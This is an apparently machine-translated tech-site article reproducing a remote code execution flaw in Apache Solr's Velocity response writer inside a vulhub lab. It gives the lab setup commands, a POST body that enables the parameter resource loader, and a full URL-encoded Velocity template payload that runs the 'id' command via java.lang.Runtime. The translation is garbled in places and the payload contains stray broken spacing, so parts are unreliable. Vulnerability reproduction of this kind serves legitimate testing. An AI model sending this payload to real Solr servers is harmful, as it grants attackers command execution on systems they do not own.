Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you about the recurrence of RCE vulnerabilities injected into the Apache Solr Velocity template. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

Introduction to 0x00

Solr is an independent enterprise search application server that provides an API interface similar to Web-service. Users can submit a certain format of XML file to the search engine server through http request to generate an index, or they can make a search request through Http Get operation and get the return result in XML format.

Overview of 0x01 vulnerabilities

The vulnerability occurs for two reasons: when an attacker has direct access to the Solr console, he can make changes to the node's configuration file by sending an POST request like / node name / config. Apache Solr integrates the VelocityResponseWriter plug-in by default. The option params.resource.loader.enabled in the plug-in's initialization parameters is used to control whether the parameter resource loader is allowed to specify templates in the Solr request parameters. The default setting is false.

When params.resource.loader.enabled is set to true, the user is allowed to specify the loading of related resources by setting parameters in the request, which means that an attacker can execute commands on the server by constructing a threatening attack request. (from 360CERT) 0x02 influence range Apache Solr 5.x-8.2.0, there is a config API version

Build an online environment in 0x03 environment: forward this article to moments, and send screenshots to the official account to build your own:

Use the environment of CVE-2019-0193 in vulhub to build

Start the vulhub environment:

Git clone https://github.com/vulhub/vulhub.gitcd vulhub/solr/CVE-2019-0193docker-compose up-d

Create a Core named test:

Docker-compose exec solr bash bin/solr create_core-c test-d example/example-DIH/solr/db

After setting up, the default port is 8983, and you can access http://ip:8983.

0x04 vulnerability exploitation

Utilization premise: the attacker needs to know the name of the Core in the Solr service to execute the attack.

The name shown in the above figure is the name of Core.

Directly construct a POST request with the following data in the / solr/test/config directory POST (modify the configuration of Core)

{"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}

Then send the request using the public exp

Http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor() +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

The command can be executed successfully.

The above is how the editor repeats the RCE vulnerabilities injected into the Apache Solr Velocity template shared by you. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.